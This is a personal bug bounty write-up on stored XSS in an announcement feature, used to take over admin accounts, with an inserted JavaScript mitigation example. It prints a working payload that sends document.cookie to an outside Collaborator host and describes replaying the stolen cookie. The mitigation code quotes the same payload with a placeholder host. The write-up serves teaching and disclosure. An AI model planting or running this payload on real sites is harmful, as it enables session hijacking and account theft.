The Story of a Mass Account Takeover Through Stored XSS (Cross-Site Scripting).


Rajdip Chavan

ACCOUNT TAKEOVER

Hey there,

As this is my first article, pardon me if there are any mistakes, and do let me know how I can improve.

So, without wasting any time, let's jump into the main story.

A brief overview of the application: it served as a Management System with User Management and Report Generation functionality. Interestingly, it included a feature called Announcements, which allowed any user to broadcast messages to the other users in the organization. These announcements were prominently displayed on every user's dashboard.

Now, as you may have guessed, the announcement functionality was vulnerable to stored XSS.

Let's see the steps to take over the ADMIN account:

1. Create a new announcement with the XSS payload below to fetch the ADMIN cookies:

<script>new Image().src="http://<Your Burp Collaborator Link>/abc.php?output="+document.cookie;</script>

2. Now, whenever the admin logs in to the application, our payload executes and we receive the admin's cookies.

(Screenshot: XSS payload executed)
(Screenshot: cookies fetched in Burp Collaborator)

3. Now, by simply changing the cookie values in the browser (assuming you know how to do that), we can access the ADMIN account.
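The chain above works because the announcement text is placed into the dashboard unencoded and the session cookie is readable from document.cookie. The two server-side controls that break it, as an added example in JavaScript that is not code from the original post: HTML-encode the announcement before it reaches the dashboard, and issue the session cookie with HttpOnly. The dashboard markup, the cookie name SESSIONID and the placeholder host in the sample are assumptions made for this example.

```javascript
// Added example for this post (not the author's code): two server-side
// mitigations that break the announcement-XSS-to-admin-cookie chain.
//
//  - escapeHtml()/renderAnnouncement(): encode announcement text before it is
//    placed in the dashboard HTML, so a stored "<script>" renders as text.
//  - sessionCookieHeader(): issue the session cookie with HttpOnly, so a script
//    that does execute cannot read it from document.cookie.
//
// The dashboard markup, the cookie name SESSIONID and the placeholder host in
// the sample are assumptions made for this example.

// Encode the characters that can change HTML context in element content or
// in a quoted attribute value.
function escapeHtml(text) {
  const map = {
    '&': '&amp;',
    '<': '&lt;',
    '>': '&gt;',
    '"': '&quot;',
    "'": '&#x27;',
    '/': '&#x2F;',
  };
  return String(text).replace(/[&<>"'\/]/g, (ch) => map[ch]);
}

// Render one stored announcement into the dashboard (hypothetical markup).
// Only the encoded form reaches the page, so the browser displays the payload
// instead of executing it.
function renderAnnouncement(announcement) {
  return `<div class="announcement">${escapeHtml(announcement)}</div>`;
}

// Build the Set-Cookie value for the session. HttpOnly is the attribute that
// defeats this post's payload; Secure and SameSite=Lax are standard hardening
// issued alongside it.
function sessionCookieHeader(sessionId) {
  // Reject anything that could smuggle extra cookie attributes into the header.
  if (!/^[A-Za-z0-9_-]+$/.test(sessionId)) {
    throw new Error('session id must be a plain token');
  }
  return `SESSIONID=${sessionId}; Path=/; HttpOnly; Secure; SameSite=Lax`;
}

// Reviewer self-check: does rendered output still contain a raw script tag?
function containsRawScriptTag(html) {
  return /<script/i.test(html);
}

// Constructed sample: the announcement body from the post, with the
// Collaborator host replaced by a placeholder.
const SAMPLE_ANNOUNCEMENT =
  '<script>new Image().src="http://<exfil-host-placeholder>/abc.php?output="+document.cookie;</script>';

// Stand-alone run: print the encoded announcement and the cookie header.
if (typeof require !== 'undefined' && require.main === module) {
  const html = renderAnnouncement(SAMPLE_ANNOUNCEMENT);
  console.log(html);
  console.log('raw <script> present:', containsRawScriptTag(html));
  console.log(sessionCookieHeader('constructed-session-id'));
}
```

Encoding the announcement stops the script from running at all; HttpOnly is the second layer, so that a script which slips through some other sink still cannot read the session identifier.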

That's how we can take over the account of any user working in that organization. But... wait! Can we chain this bug to exploit any further vulnerability?

Yes! In the next article we will see how I chained this bug to gain RCE.

Until then, enjoy life and see you soon.

Bye Bye! Sayonara!